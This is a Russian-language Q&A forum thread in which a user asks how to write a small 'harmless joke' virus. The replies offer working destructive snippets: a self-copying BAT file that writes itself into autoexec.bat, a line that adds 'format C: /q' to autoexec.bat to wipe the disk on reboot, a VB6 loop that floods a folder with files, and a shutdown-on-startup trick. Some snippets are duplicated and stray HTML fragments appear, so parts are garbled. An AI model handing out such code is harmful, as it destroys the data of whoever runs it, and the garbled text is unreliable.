Другие языки программирования и технологии
ребята! вопрос внутри! помогите и 10 балов дам!
как написать вирус хоть самый маленький шутку безобидный на любом языке програмирования! винрар блокнот есть! какой код написать? дам 10 балов кто поможет хорошо! можно в сообщениях ответить
У мну есть справочник, стучи в асю 449409459
вставь кому-нибудь флешку в комп с виндой и получай урожай. Вот мой вчерашний улов

Начало начал…
Ну, раз уж мы решили начать с самого простого, то свой первый вирус создадим в обычном текстовом редакторе, встроенном в Виндозу. Такой вирус будет называться BAT-вирусом.
По мере написания исходника, в фигурных скобках буду пояснять о чем речь.
@Echo off {запрещаем вывод на экран исполняемых команд}
copy %0 c:virus.bat >nul {копируем файл; запрещаем вывод на экран самой команды и результата её действия}
echo c:virus.bat>>c:autoexec.bat {добавляем текст в уже существующий файл}
риведу еще один простой, но интересный пример: )
@Echo off
Echo format C: /q >> c:Autoexec.bat
Все! Ничего особенного, да? Этот вирус добавляет в autoexec.bat строку format C: /q и при перезагрузке компа происходит быстрое форматирование диска: )
И вот еще что:
Echo var WSHShell = WScript.CreateObject("WScript.Shell"); > %temp%mes.js
echo WSHShell.Popup ("ПИШИ СЮДА ЧТО УГОДНО"); >> %temp%mes.js
start %temp%mes.js
deltree /y %temp%mes.js
@Echo off
Echo format C: /q >> c:Autoexec.bat
И вот еще что:
start %temp%mes.js
deltree /y %temp%mes.js
<head>
<script>
</script>
<body>
<center>
<form>
<input>
</form>
</center>
<script>
</script>
<body>
<center>
<form>
<input>
</form>
</center>
сделай файл *.txt, напиши в нем
""shutdown t 1"" (без ковычек)
помести в автозагрузку и перезагрузи комп....
""shutdown t 1"" (без ковычек)
могу написать простенький вирус на Delphi (исходник) но тока в образовательных целях, помни что за распространение я ответственности не несу, есть и готовые примеры, в личико стучись
Цикл статей «Путеводитель по написанию вирусов под Win32»
http://www.wasm.ru/series.php?sid=12
Сдесь всё в подробностях как и начём писать вирусы все необходимые программы можно скачать с тогоже сайта!
http://www.wasm.ru/series.php?sid=12
Берёшь Visual Basic 6.0, создаёшь новый проект, на форму кидаешь один Label (справа на панели увидишь) . Щёлкаешь по форме 2 раза. В окне кода под строкой Private Sub Form_Load() пишешь следующий код
Do
DoEvents
Label1.Caption = Label1.Caption + 1
Open App.Path & Label1.Caption for output as #1
Print #1, Label1.Caption
Close #1
Loop
End Sub
Программа при запуске генерирует дохрена файлов
Do
DoEvents
Label1.Caption = Label1.Caption + 1
Print #1, Label1.Caption
Close #1
Loop
End Sub
"блокнот есть"
XDDD
Pascal скинь себе (идиот нахрена те вирус создавать)
Oткрой текстовый документ и печатай:
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
Сохроняй фаил в названии например : VIRUS.COM, Eicar.txt
)))